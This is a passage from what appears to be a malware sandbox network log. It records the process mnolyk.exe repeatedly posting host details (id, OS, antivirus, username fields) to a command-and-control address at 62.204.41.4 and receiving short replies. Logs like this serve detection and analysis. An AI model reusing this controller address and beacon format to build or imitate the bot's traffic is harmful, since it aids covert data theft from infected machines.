                                                                      Feb 7, 2023 23:07:06.733525038 CET125INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      210192.168.2.74990562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:57.664789915 CET325OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:57.728919029 CET325INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      211192.168.2.74990662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:58.951741934 CET326OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:59.014985085 CET326INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      212192.168.2.74990762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:59.344645023 CET327OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:59.408628941 CET327INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      213192.168.2.74990862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:59.582545042 CET328OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:59.646224022 CET328INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      214192.168.2.74990962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:59.832612991 CET329OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:59.896001101 CET329INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      215192.168.2.74991062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:00.070255041 CET330OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:00.134892941 CET330INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      216192.168.2.74991162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:00.309876919 CET331OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:00.373950958 CET331INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      217192.168.2.74991262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:00.559984922 CET332OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:00.624990940 CET332INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      218192.168.2.74991362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:00.811570883 CET333OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:00.876718044 CET333INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      219192.168.2.74991462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:01.055768967 CET334OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:01.122400999 CET334INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      22192.168.2.74971662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:06.915416002 CET126OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:06.978020906 CET126INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      220192.168.2.74991562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:01.310914993 CET335OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:01.375654936 CET335INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      221192.168.2.74991662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:01.554969072 CET336OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:01.617985010 CET336INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      222192.168.2.74991762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:01.811544895 CET337OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:01.876722097 CET337INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      223192.168.2.74991862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:02.062413931 CET338OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:02.127065897 CET338INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      224192.168.2.74991962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:02.303850889 CET339OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:02.370109081 CET339INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      225192.168.2.74992062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:02.536242008 CET340OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:02.599940062 CET340INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      226192.168.2.74992162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:02.784331083 CET341OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:02.846324921 CET341INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      227192.168.2.74992262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:03.022274971 CET342OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:03.090607882 CET342INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      228192.168.2.74992362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:03.274770021 CET343OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
